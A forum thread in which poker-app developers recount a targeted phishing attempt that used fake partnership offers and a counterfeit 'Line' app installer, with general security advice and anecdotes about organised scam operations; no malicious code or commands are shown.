Phishing Scam Targeting Poker Players and Site Operators

So many red flags though.

There were some red flags for sure but overall I'd say it was higher social engineering quality than average.

* The premise of the call was very plausible
* I've spent a lot of time building a web/mobile app but it's a hyper-competitive space so of course I'm always looking for ways to grow it, gain users, get more feedback, so for someone to take enough interest to want to partner is both flattering and seems like it could be key feedback and growth channel so I was very predisposed to being open to partnerships
* Importantly, he didn't suggest a call, he gave enough of a reason where I suggested a call, making it feel less scammy. He also spaced a few days between messages making it seem less urgent.
* "Install this random app" is one of the big red flags, but we were on Discord, and Discord is in fact banned in China, so it's plausible to switch apps since they would need to be on a VPN to use Discord
* Poker players have some association with China via Macau games
* Line is one of the most popular apps in Asia
* His link seemed like it could possibly deeplink to his contact on the app
* Both ChatGPT and Claude didn't flag it as obviously a scam and verified Line was a legit app (I ran it past them initially)
* The site they gave me extensively copied almost every page from the official Lien app with the same styles

Obviously any scam has red flags in hindsight but a key aspect of social engineering is they put your brain in some other "mode" (romantic,business) where you might look past one or two red flags especially if there's some plausible reason for them.

I reached out to the poker mindset group and the scammer previously targeted them and was now impersonating them.

As an aside, best way to protect yourself from this stuff besides checking URLs (very tricky), is

* 2-Factor Authentication (2FA) EVERYWHERE important, with ANY info you wouldnt want scammers to have. Phone 2factor is the least secure since SIM Hijacking is a thing but way better than nothing, google authenticator app better, hardware yubikey best
* Use a password manager like 1password so you don't have any password re-use across sites

You've been struck by a smooth criminal.

plot twist op is hacker who had a fall out with his hacking group

Quick followup:

I wanted to note that actually the file did not scan as malware using a tool like malwarebytes. But I unarchived the file and found an obfuscated script and ran that through several scanners and only 1 of them flagged it . So the operation "wrapped" their malware in a "clean" container and overall had many aspects of being a professional operation.

There was another huge red flag in that the install was copy to terminal not copy to applications, however again, part of brain that just wants to move along said "just offbeat installation method".

I'll admit this whole thing spooked me a bit because I was _very_ close to getting compromised. I literally have done security engineering for billion dollar companies and I still glossed over some red flags. A huge part is that, I'm used to "wide net" low effort scams, andwhile I understadn if you're VP of a crypto exchange you might get very targeted social engineering scams, I didn't think highly targeted socail engineering scams would target a tiny operation like mine.

I strongly suspect this type of scamis an organized crime ring of sorts with many 'employees' constantly iterating at making the scam more sophisticated. The low effort Nigerian prince era is over now regular people are getting highly targeted attacks.

I also been chasing breadcrumbs and spoke with a few others and verified this operation did successfully steal some money from some players. But people are embarassed to admit it and then I read reddit threads and people always want to dump on the victim for ignoring a red flag here and there. But I'm seeing how the social engineering is getting increasingly sophisticated and looking for emotionals buttons to press, for example make something seem urgent by spoofing your employer, make something seem more credible using leaked data about you, etc.

Another thing is you might have some level of security like 2-factor auth but forget theres other vectors such as , maybe a recovery email without 2fa on it. Its worth trying to hack yourself with just a password and making sure 2fa is secure. Most carriers also disable SIM protection by default, mine was off.

The scam operation will try to access as much about you as possible, even something you think doesnt have improtant stuff ilke financial accses, might have some info about you that can escalate the scam elsewhere, might be able to impersonate you to more easily scam someone else you know, etc. So there's a big surface area to audit.

It's easy to criticize people who get scammed but all that does is make them feel too embarrassed to share details about the scam. The social engineering can play a huge role and if you're someone who's never, ever let an emotional button cloud a rational decision, then congrats youre in the 1% whos invulnerable but for everyone else there might be an angle someone could get you to drop your guard.

Poker players are a good target when you realize many of them use crypto to pay online, that moneys often in a hot wallet or exchange and not in cold storage, a lot of poker players invest even more in crypto outside of poker playing, a lot of poker players are more online savvy which can actually make you more vulnerable in terms of surface area. Ultimately I think I'm in the very high percentile of cybersecurity knowledge but still almost go compromised.

I'm pissed at this operation for even trying to come after me, **** scammers, so I'm spreading knowledge of these scams and security vector to shut their efforts down which is the best and only revenge I have.

Pretty sure LAG Poker Dmed me on here to talk hands, I just ignored it but good to know he was a scammer

A while ago, one of my friends from Ukraine got a job offer to work as a professional scammer. She had quit being a doctor at that time and was looking for another career path. She knew German because her previous goal was to move to Germany.

So she went to an interview, not yet knowing it was a scam company. From their job posting, it wasn't obvious—the only requirement was to fluently speak German and a promise of high salary. At the end of the interview, it became apparent that the company was scamming German-speaking Europeans. Pretending to be financial advisors, they would convince people to invest their funds. And the company had a nice office in a nice location in the capital of Ukraine 😀

Obviously, she never took the job, but she didn't report the company to the police either. In Ukraine, such "companies" are usually protected by the police.

My point is that there are probably plenty of 'companies' like this throughout the world. I had never thought about this before my friend told me this story, but people go to work in nice offices, and their specialization is scamming. Be careful: don't click on weird stuff, don't download weird stuff, and don't speak with anyone on the telephone about investing 😀

I got the same DM as OP (from a legit 2+2 account that they had hacked). The same as with OP, the premise was to partner with my bankroll tracker app (

https://poler.app

Poler

Poler

Luckily I got a DM from 2+2 support a couple of days later to say that the account had been hacked and to not click any links in the message.

I have a thread in the poker software forum on here. OP, do you have the same? I wonder if that’s where they look for targets.

I have to agree with OP that the approach they used was at least somewhat convincing, due to the fact that it was very poker-specific, and that they weren’t pushy. For operators of a small project, a collaboration proposal might be quite appealing and cause people to lower their guard.

Just to be clear, the original DM on 2+2 didn't come from an account called LagPoker or similar (at least not the one I received). LagPoker is the username they used on Discord.